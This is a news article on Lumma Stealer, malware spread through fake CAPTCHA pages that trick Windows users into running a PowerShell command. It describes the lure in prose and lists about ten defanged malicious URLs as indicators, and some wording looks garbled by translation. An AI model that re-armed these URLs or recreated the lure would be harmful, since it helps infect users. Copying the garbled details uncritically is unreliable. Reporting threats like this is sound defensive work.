Fake CAPTCHA pages are being used to hack your computer

Lumma Stealer, a recently identified information-stealing malware, is being distributed to users via fake human verification pages. According to researchers at cybersecurity firm CloudSEK, the malware targets Windows devices and is designed to steal sensitive information from the infected device. Worryingly, researchers have discovered multiple phishing websites that use these fake verification pages to trick users into downloading the malware. CloudSEK researchers have warned organizations to implement endpoint protection solutions and train employees and users on this new social engineering tactic.

Lumma Stealer malware is being spread via new phishing technique

According to CloudSEK reportmultiple active websites were found distributing the Lumma Stealer malware. The technique was first discovers by Unit42 at Palo Alto Networks, a cybersecurity company, but it is now believed the scale of the distribution chain is much larger than previously thought.

The attackers set up several malicious websites and added a fake human verification system, which resembles Google’s Completely Automated Public Turing test to tell Computers and Humans Apart (CAPTCHA) page. Unlike the regular CAPTCHA page, where users have to check a few boxes or perform similar pattern-based tasks to prove they are not a bot, the fake pages instruct the user to execute a number of unusual commands.

In one case, researchers discovered a fake authentication page that asked users to execute a PowerShell script. PowerShell scripts contain a series of commands that can be executed in the Run dialog. In this case, it was discovered that the commands retrieved the contents of the a.txt file hosted on a remote server. This caused a file to be downloaded and extracted on the Windows system, infecting it with Lumma Stealer.

The report also listed the malicious URLs that were spotted spreading the malware to unsuspecting users. However, this is not the complete list and there may be more such websites carrying out the attack.

• hxxps[://]heroic-genius-2b372e[.]netlify[.]app/please-verify-z[.]html

• hxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html

• hxxps[://]sdkjhfdskjnck[.]s3[.]amazons[.]com/human-verify-system[.]html

• hxxps[://]verifyhuman476[.]b-cdn[.]net/human verification system[.]html

• hxxps[://]pub-9c4ec7f3f95c448b85e464d2b533aac1[.]r2[.]dev/human-verify-system[.]html

• hxxps[://]verifyhuman476[.]b-cdn[.]net/human verification system[.]html

• hxxps[://]newvideozones[.]click/verify[.]html

• hxxps[://]chapter 3[.]dlvideosfre[.]click/human verification system[.]html

• hxxps[://]newvideozones[.]click/verify[.]html

• hxxps[://]vansetvideofre[.]click

The researchers also observed that content delivery networks (CDNs) were used to distribute these fake authentication pages. Furthermore, the attackers were seen using base64 encoding and clipboard manipulation to evade demonstration. It is also possible to distribute other malware using the same technique, although no such cases have been seen so far.

Because the modus operandi of the attack is based on phishing techniques, no security patch can prevent devices from being infected. However, there are a number of steps that users and organizations can take to protect themselves from the Lumma stealer malware.

According to the report, users and employees should be made aware of this phishing tactic to avoid falling for it. Additionally, organizations should implement and maintain reliable endpoint security solutions to detect and block PowerShell-based attacks. Regularly updating and patching systems to reduce vulnerabilities that Lumma Stealer malware can exploit should also help.